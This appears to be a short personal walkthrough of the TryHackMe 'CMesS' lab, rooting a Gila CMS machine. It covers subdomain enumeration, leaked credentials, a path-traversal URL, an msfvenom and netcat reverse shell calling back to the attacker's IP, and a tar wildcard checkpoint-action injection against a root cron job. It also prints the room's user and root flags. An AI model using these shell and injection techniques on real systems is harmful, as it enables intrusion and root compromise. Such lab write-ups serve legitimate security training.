CMesS

Can you root this Gila CMS box?

#ip 10.10.134.63

cmess.thm in /etc/hosts
`about cmess.thm
CMS:	Gila 1.10.9
Server:	Apache 2.4.18
OS:		Ubuntu
`
`
/robots.txt
User-agent: *
Disallow: /src/
Disallow: /themes/
Disallow: /lib/
`


`
subdomains:
dev.cmess.thm
//on the page//
`
```
Development Log
andre@cmess.thm

Have you guys fixed the bug that was found on live?
support@cmess.thm

Hey Andre, We have managed to fix the misconfigured .htaccess file, we're hoping to patch it in the upcoming patch!
support@cmess.thm

Update! We have had to delay the patch due to unforeseen circumstances
andre@cmess.thm

That's ok, can you guys reset my password if you get a moment, I seem to be unable to get onto the admin panel.
support@cmess.thm

Your password has been reset. Here: KPFTN_f2yxe
```
`
/admin
andre@cmess.thm:KPFTN_f2yxe
`

`
trying local file inclusion
`
```
cmess.thm/admin/fm/?f=src../../../../../../../../../WINDOWS/system32/drivers/etc/hosts
```

`
ssh cerds
`
```
andre:UQfsdCB7aAP6
```
`
user.txt
`
```
thm{c529b5d5d6ab6b430b7eb1903b2b5e1b}
```
`
prevesc
`
```

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

*/2 *   * * *   root    cd /home/mandre/backup && tar -zcf /tmp/andre_backup.tar.gz *

its tar wildcard since its 'tar.gz *' has astric

msfvenom -p cmd/unix/reverse_netcat lhost=10.8.99.121 lport=5555 R

//on target
mkfifo /tmp/dqgxbq; nc 10.8.99.121 5555 0</tmp/dqgxbq | /bin/sh >/tmp/dqgxbq 2>&1; rm /tmp/dqgxbq
echo "" > "--checkpoint-action=exec=sh shell.sh" && echo "" > --checkpoint=1

//now wait for the cronjob to do its work
we got the shell
```
`
Root flag
`
```
thm{9f85b7fdeb2cf96985bf5761a93546a2}
```